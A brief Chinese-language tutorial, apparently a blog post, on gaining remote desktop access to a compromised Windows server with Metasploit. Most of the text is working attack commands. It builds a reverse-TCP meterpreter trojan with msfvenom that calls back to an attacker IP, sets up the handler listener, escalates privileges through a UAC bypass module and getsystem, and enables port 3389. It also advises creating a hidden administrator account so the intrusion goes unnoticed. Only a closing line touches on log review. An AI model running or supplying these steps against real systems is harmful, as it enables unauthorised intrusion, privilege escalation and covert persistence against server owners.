msf開啟提權及開啟3389端口
背景:
在我們獲取windows服務器反彈shell后,是命令行,如何開啟遠程界面呢?
以下做一下演示:
流程:
1.生成shell木馬
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.128 lport=4444 -f exe>shell.exe
2.設置監聽
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 0.0.0.0 lhost => 0.0.0.0 msf6 exploit(multi/handler) > set lport 4444 lport => 4444 msf6 exploit(multi/handler) > exploit
3.getuid 是普通用戶權限 嘗試getsystem 失敗,利用uac提權
use exploit/windows/local/bypassuac set session 2 exploit
上線后
getuid
getsystem 提權成功
4.執行 post/windows/manage/enable_tcp 開啟3389端口
run post/windows/manage/enable_tcp #開啟3389端口
5.運行mstsc
這里有個注意點就是,你這邊遠程登錄后,另一邊的賬戶會被注銷,這樣就會被發現,所有還是自己net user 一個管理員組用戶進行遠程連接
簡單的日志排查
當然你也可以在你的控制面板-系統安全-管理工具-查看時間日志 進行查看日志排查:發現遠程ip登錄過這個主機